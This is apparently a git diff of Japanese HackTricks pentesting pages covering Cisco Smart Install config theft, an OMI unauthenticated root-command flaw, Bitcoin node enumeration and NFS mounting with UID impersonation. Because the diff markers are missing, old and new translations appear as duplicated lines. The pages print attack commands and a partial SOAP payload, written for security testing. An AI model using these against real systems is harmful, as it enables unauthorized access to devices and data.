**[SIET](https://github.com/frostbits-security/SIET) (Smart Install Exploitation Tool)** **は、この脆弱性を悪用するために開発されました。Cisco Smart Installを悪用することができます。この記事では、正当なネットワークハードウェアの設定ファイルを読み取る方法を紹介します。構成の外部流出は、ペンテスターにとって有益であり、ネットワークの固有の機能について学ぶことができます。これにより、攻撃の新たなベクトルを見つけることが容易になり、生活が楽になります。
**ターゲットデバイスは「ライブ」のCisco Catalyst 2960スイッチです。仮想イメージにはCisco Smart Installがないため、実際のハードウェアでのみ練習できます。**
**ターゲットデバイスは「ライブ」Cisco Catalyst 2960スイッチになります。仮想イメージにはCisco Smart Installがないため、実際のハードウェアでのみ練習できます。**
ターゲットスイッチのアドレスは**10.10.100.10でCSIがアクティブです。** SIETをロードして攻撃を開始します。**-g引数**はデバイスから構成の外部流出を意味し、**-i引数**は脆弱なターゲットのIPアドレスを設定することができます。
ターゲットスイッチのアドレスは**10.10.100.10でCSIがアクティブ**です。SIETをロードして攻撃を開始します。**-g引数**はデバイスから構成の外部流出を意味し、**-i引数**は脆弱なターゲットのIPアドレスを設定できます。
```
~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10
```
<figure><img src="../.gitbook/assets/image (302).png" alt=""><figcaption></figcaption></figure>
スイッチの設定 **10.10.100.10****tftp/** フォルダにあります。
スイッチの構成 **10.10.100.10****tftp/** フォルダになります
\
@ -52,10 +52,10 @@ PORT STATE SERVICE
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricks で企業を宣伝**したいですか?または **最新バージョンの PEASS を入手したり、HackTricks を PDF でダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけてください
* [**公式 PEASS & HackTricks スウォッグ**](https://peass.creator-spring.com) を手に入れましょう
* **💬** [**Discord グループ**](https://discord.gg/hRep4RUj7f) または [**telegram グループ**](https://t.me/peass) に **参加** するか、**Twitter** で **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** をフォローしてください。**
* **ハッキングテクニックを共有するために、[hacktricks リポジトリ](https://github.com/carlospolop/hacktricks) [hacktricks-cloud リポジトリ](https://github.com/carlospolop/hacktricks-cloud)** PR を提出してください。
</details>

32
network-services-pentesting/5439-pentesting-redshift.md
View file

@ -1,33 +1,7 @@
# 5439 - Redshiftのペンテスト
# 基本情報
<details>
このポートは**Redshift**によって使用されます。基本的には**PostgreSQL**のAWSバリエーションです。
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローしてください。
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
## 基本情報
このポートは**Redshift**の実行に使用されます。基本的には**PostgreSQL**のAWSバリエーションです。
詳細については、次を参照してください:
詳細については次を参照してください:
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローしてください。
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>

52
network-services-pentesting/5985-5986-pentesting-omi.md
View file

@ -1,41 +1,25 @@
# 5985,5986 - OMIのペンテスト
# 基本情報
<details>
OMIは、Microsoftが開発した[オープンソース](https://github.com/microsoft/omi)のリモート構成管理ツールです。OMIエージェントは、以下のサービスが使用されている場合に、Azure Linuxサーバーに一般的にインストールされています
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Azure Automation
- Azure Automatic Update
- Azure Operations Management Suite
- Azure Log Analytics
- Azure Configuration Management
- Azure Diagnostics
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
## 基本情報
OMIは、Microsoftによって開発されたオープンソースのリモート構成管理ツールです。OMIエージェントは、以下のサービスが使用されている場合によくAzure Linuxサーバーにインストールされています。
* Azure Automation
* Azure Automatic Update
* Azure Operations Management Suite
* Azure Log Analytics
* Azure Configuration Management
* Azure Diagnostics
これらのサービスが構成されている場合、omiengineプロセスはすべてのインターフェースでリッスンし、rootユーザーとして実行されます。
<figure><img src="../.gitbook/assets/image (1) (3) (2).png" alt=""><figcaption></figcaption></figure>
これらのサービスが構成されると、omiengineプロセスはすべてのインターフェースでリッスンし、rootユーザーとして実行されます。
**デフォルトポート:** 5985(http), 5986(https)
## [CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)
2021年9月16日現在、Azureで新しく作成されたLinuxサーバーは、依然として脆弱なバージョンのOMIエージェントがパッケージ化されています。Linuxサーバーを展開し、上記のサービスのいずれかを有効にすると、サーバーは脆弱な状態になります。
2021年9月16日時点で、Azureで新しく作成されたLinuxサーバーは、依然として脆弱なOMIエージェントのバージョンでパッケージ化されています。Linuxサーバーを展開し、上記のサービスのいずれかを有効にした後、サーバーは脆弱な状態になります。
OMIサーバーは/wsmanエンドポイントを介して構成管理メッセージを受信します。通常、メッセージとともに認証ヘッダーが渡され、OMIサーバーはクライアントが通信するために認可されていることを確認します。この場合、脆弱性は、認証ヘッダーがない場合にサーバーがメッセージを誤って受け入れ、ルートユーザーの下で命令を実行することです。
OMIサーバーは、/wsmanエンドポイントを介して構成管理メッセージを受信します。通常、メッセージと共に認証ヘッダーが渡され、OMIサーバーはクライアントが通信を許可されていることを確認します。この場合、脆弱性は、認証ヘッダーがない場合にサーバーがメッセージを誤って受け入れ、ルートユーザーの下で命令を実行することです。
認証ヘッダーが指定されていない状態で「ExecuteShellCommand」SOAPペイロードをサーバーに投稿すると、それはルートとしてコマンドを実行します。
認証ヘッダーが指定されていない状態でサーバーに「ExecuteShellCommand」SOAPペイロードを投稿すると、サーバーはルートとしてコマンドを実行します。
```xml
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
@ -47,7 +31,7 @@ OMIサーバーは/wsmanエンドポイントを介して構成管理メッセ
</s:Body>
</s:Envelope>
```
[https://github.com/horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647)には完全なエクスプロイトがあります。
[https://github.com/horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647) で完全なエクスプロイトを見つける
## 参考文献
@ -58,10 +42,10 @@ OMIサーバーは/wsmanエンドポイントを介して構成管理メッセ
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセス**したいですか?または、**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するに、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンを入手**したいですかまたは、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>

36
network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md
View file

@ -1,23 +1,23 @@
# 8333,18333,38333,18444 - ビットコインのペンテスト
# 8333,18333,38333,18444 - Bitcoinのペンテスト
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセス**したいですか、またはHackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、当社の独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクション
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、または**Twitter**で私をフォローする**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
</details>
## 基本情報
* **ポート8333**は、**メインネット**のビットコインノード間の通信に使用されます。
* **ポート18333**は、**テストネット**のビットコインノード間の通信に使用されます。
* **ポート38333**は、**サインネット**のビットコインノード間の通信に使用されます。
* **ポート18444**は、**レグテスト**(ローカル)のビットコインノード間の通信に使用されます。
* **ポート8333**は、**mainnet**でBitcoinードがお互いに通信するために使用されます。
* **ポート18333**は、**testnet**でBitcoinードがお互いに通信するために使用されます。
* **ポート38333**は、**signet**でBitcoinードがお互いに通信するために使用されます。
* **ポート18444**は、**regtest**ローカルでBitcoinードがお互いに通信するために使用されます。
**デフォルトポート:** 8333, 18333, 38333, 18444
```
@ -31,7 +31,7 @@ PORT STATE SERVICE
## 列挙
Bitcoinードは、あなたが別の有効なBitcoinードであると思われる場合、いくつかの情報を提供します。**Nmap**には、この情報を抽出するためのいくつかのスクリプトがあります。
Bitcoinードは、あなたが別の有効なBitcoinードであると思場合、いくつかの情報を提供します。**Nmap**には、この情報を抽出するためのいくつかのスクリプトがあります。
```
sudo nmap -p 8333 --script bitcoin-info --script bitcoin-getaddr 170.39.103.39
PORT STATE SERVICE
@ -56,12 +56,12 @@ PORT STATE SERVICE
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングのトリックを共有する**には、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか?**HackTricksで会社を宣伝**してみたいですか?または**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションです。
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう。
* **[💬 Discordグループ](https://emojipedia.org/speech-balloon/)に参加**するか、[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>

118
network-services-pentesting/nfs-service-pentesting.md
View file

@ -4,23 +4,23 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に**参加**するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
## **基本情報**
NFSは、ネットワーク上のファイルにアクセスし、それらをローカルのファイルディレクトリと同様に扱うためのクライアント/サーバーシステムです。SMBと同じ目的を持っていますが、SMBとは通信できません。
これはクライアント/サーバーシステムであり、ユーザーがネットワーク全体のファイルにアクセスし、それらをローカルファイルディレクトリに存在するかのように扱うことを可能にします。SMBと同じ目的を持っていますが、SMBとは通信できません。
NFSプロトコルには、**認証**または**認可**のためのメカニズムはありません。認可は、サーバーがクライアントから提供された**ユーザー情報**をファイルシステムの情報に変換し、UNIXで必要な構文にできるだけ正確に変換することを担当します。
NFSプロトコルには**認証**または**承認**のための**メカニズムがありません**。承認は、サーバーが**クライアント**が提供した**ユーザー情報**を**ファイルシステム**の情報から取得し、UNIXで必要な構文にできるだけ正確に変換する責任があるため、行われます。
最も一般的な**認証方法はUNIXの`UID`/`GID`と`グループメンバーシップ`**です。そのため、この構文がNFSプロトコルに適用される可能性が最も高いです。問題は、**クライアント**と**サーバー**が**必ずしも**同じ**UID/GIDのマッピング**を持っている必要がないことです。サーバー側ではさらなるチェックは行われません。そのため、NFSは**信頼できるネットワーク**でのみこの認証方法で使用する必要があります。
最も一般的な**認証方法はUNIXの`UID`/`GID`および`グループメンバーシップ`**を介して行われます。そのため、この構文がNFSプロトコルに最も適用される可能性が高いです。問題は、**クライアント**と**サーバー**が**UID/GID**をユーザーやグループにマッピングする際に**必ずしも同じである必要がない**ということです。サーバー側で追加のチェックを行うことはできません。そのため、NFSは**信頼できるネットワーク**でのみこの認証方法を使用すべきです。
**デフォルトポート**: 2049/TCP/UDPバージョン4を除く、TCPまたはUDPのみ必要&#x20;
**デフォルトポート**: 2049/TCP/UDPバージョン4を除く、TCPまたはUDPのみ必要です)。&#x20;
```
2049/tcp open nfs 2-3 (RPC #100003
```
@ -30,9 +30,9 @@ NFSプロトコルには、**認証**または**認可**のためのメカニズ
| **バージョン** | **特徴** |
| ----------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `NFSv2` | これは**古い**バージョンですが、多くのシステムでサポートされており、最初は完全にUDPで動作していました。 |
| `NFSv3` | 変数サイズとより良いエラーレポートなど、より多くの機能を備えていますが、NFSv2クライアントと完全に互換性がありません。 |
| `NFSv4` | Kerberosを含み、ファイアウォールインターネットを介して動作し、**ポートマッパーが不要**になり、ACLをサポートし、状態ベースの操作を適用し、パフォーマンスの向上と高い**セキュリティ**を提供します。また、最初のバージョンで状態を持つプロトコルを持っています。 |
| `NFSv2` | **古い**ですが、多くのシステムでサポートされており、最初は完全にUDP経由で動作していました。 |
| `NFSv3` | 変数ファイルサイズやより良いエラー報告など、より多くの機能を備えていますが、NFSv2クライアントと完全に互換性があるわけではありません。 |
| `NFSv4` | Kerberosを含み、ファイアウォールおよびインターネットを介して動作し、**ポートマッパーが不要**になり、ACLをサポートし、状態ベースの操作を適用し、パフォーマンスの向上と高い**セキュリティ**を提供します。また、最初の状態を持つプロトコルを持つバージョンでもあります。 |
## 列挙
@ -43,100 +43,60 @@ nfs-showmount #Like showmount -e
nfs-statfs #Disk statistics and info from NFS share
```
### 便利なMetasploitモジュール
Metasploitモジュールは、NFSサービスのペンテストに役立つさまざまな機能を提供します。
#### nfs_enum
このモジュールは、NFS共有の情報を列挙するために使用されます。以下のコマンドを使用して実行します。
```
use auxiliary/scanner/nfs/nfsmount
```
#### nfs_showmount
このモジュールは、NFSサーバーがエクスポートしている共有を表示するために使用されます。以下のコマンドを使用して実行します。
```
use auxiliary/scanner/nfs/nfs_showmount
```
#### nfs_version
このモジュールは、NFSサーバーのバージョンを特定するために使用されます。以下のコマンドを使用して実行します。
```
use auxiliary/scanner/nfs/nfs_version
```
#### nfs_mount
このモジュールは、NFS共有をマウントするために使用されます。以下のコマンドを使用して実行します。
```
use exploit/linux/nfs/nfs_mount
```
#### nfs_rpcbind
このモジュールは、NFSサーバーのRPCバインドサービスを検出するために使用されます。以下のコマンドを使用して実行します。
```
use auxiliary/scanner/nfs/nfs_rpcbind
```
これらのMetasploitモジュールを使用することで、NFSサービスのペンテストに役立つ情報を取得できます。
```bash
scanner/nfs/nfsmount #Scan NFS mounts and list permissions
```
### マウント
サーバーがマウント可能な**フォルダ**を知るために、次のコマンドを使用してサーバーに問い合わせることができます。
サーバーがマウント可能な**フォルダ**を知るには、次のコマンドを使用して問い合わせます:
```bash
showmount -e <IP>
```
次に、次のコマンドを使用してマウントします:
その後、次のようにマウントします:
```bash
mount -t nfs [-o vers=2] <ip>:<remote_folder> <local_folder> -o nolock
```
次の例では、バージョン2を使用するように指定する必要があります。なぜなら、バージョン2には認証や承認が一切ないからです。
**日本語訳:**
**例:**
以下の例を参照してください。
```html
<p>バージョン2を使用するように指定する必要があります。なぜなら、認証や認可が一切存在しないからです。</p>
```
```bash
mkdir /mnt/new_back
mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/new_back -o nolock
```
## Permissions
## 権限
もし、**特定のユーザーにのみアクセス可能なファイルやフォルダ****UID**によって)が含まれているフォルダをマウントする場合、その**UID**を持つ**ユーザー**を**ローカルに作成**し、その**ユーザー**を使用してファイル/フォルダにアクセスすることができます。
もし、**あるユーザーにのみアクセス可能なファイルやフォルダー****UID**による)が含まれているフォルダーをマウントした場合、その**UID**を持つ**ユーザー**を**ローカル**で作成し、その**ユーザー**を使用してファイル/フォルダーに**アクセス**することができます。
## NSFShell
